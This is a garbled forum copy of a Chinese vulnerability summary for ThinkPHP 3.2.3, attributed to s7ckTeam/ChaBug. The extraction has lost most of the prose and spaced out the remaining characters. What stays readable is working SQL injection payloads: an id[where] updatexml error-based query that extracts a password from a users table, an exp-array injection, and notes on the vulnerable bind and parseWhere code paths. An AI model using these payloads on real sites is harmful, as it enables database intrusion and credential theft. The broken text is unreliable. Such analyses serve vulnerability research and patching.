[1083] 2020-03-14_ThinkPhp3漏洞总结

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-16
2020-03-14_ThinkPhp3漏洞总结 T h i n k P h p 3 C h a B u g   C h a B u g   2 0 2 0 - 0 3 - 1 4 T h i n k P h p 3 使 p h p s t r o m
T h i n k p h p 3 . 2 . 3   w h e r e
p a y l o a d h t m l s p e c i a l c h a r s ? i d [ w h e r e ] = 1   a n d   1 = u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   p a s s w o r d   f r o m   u s e r s   l i m i t   1 ) , 0 x 7 e ) , 1 ) % 2 3
4 4 2 t h i n k _ f i l t e r T h i n k P H P / L i b r a r y / T h i n k / M o d e l . c l a s s . p h p : 7 7 9 f i n d ( )
i n t i d = 1 '   - >   I ( )   - >   f i n d ( )   - >   _ _ p a r s e O p t i o n s (   - > _ p a r s e T y p e ( )
_ _ p a r s e O p t i o n s ( ) i f   ( i s s e t ( $ o p t i o n s [ ' w h e r e ' ] )   & & i s _ a r r a y ( $ o p t i o n s [ ' w h e r e ' ] )   & &   ! e m p t y ( $ f i e l d s )   & &   ! i s s e t ( $ o p t i o n s [ ' j o i n ' ] ) ) i n d e x . p h p ? i d [ w h e r e ] = 3   a n d   1 = 1
T h i n k p h p   3 . 2 . 3   e x p p a y l o a d h t t p : / / l o c a l h o s t : 8 8 8 8 / t p 3 / i n d e x . p h p ? u s e r n a m e [ 0 ] = e x p & u s e r n a m e [ 1 ] = = 1 % 2 0 a n d % 2 0 u p d a t e x m l ( 1 , c o n c a t ( 0 x 7 e , u s e r ( ) , 0 x 7 e ) , 1 )
M o d e l . c l a s s . p h p 8 2 2 t h i s > s e l e c t ( t h i s > s e l e c t ( o p t i o n s ) s e l e c t
D r i v e r . c l a s s . p h p p a r s e S q l D r i v e r . c l a s s . p h p p a r s e W h e r e w h e r e S t r . = w h e r e S t r . = t h i s - > p a r s e W h e r e I t e m ( t h i s > p a r s e K e y ( t h i s > p a r s e K e y ( k e y ) ,   $ v a l ) i f
e x p 使 I t h i n k _ f i l t e r t h i n k p h p   3 . 2 . 3   b i n d p a y l o a d   }   e l s e i f   ( ' b i n d '   = =   $ e x p )   {                                         / /   使   $ w h e r e S t r   . =   $ k e y   .   '   =   : '   .   $ v a l [ 1 ] ;
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则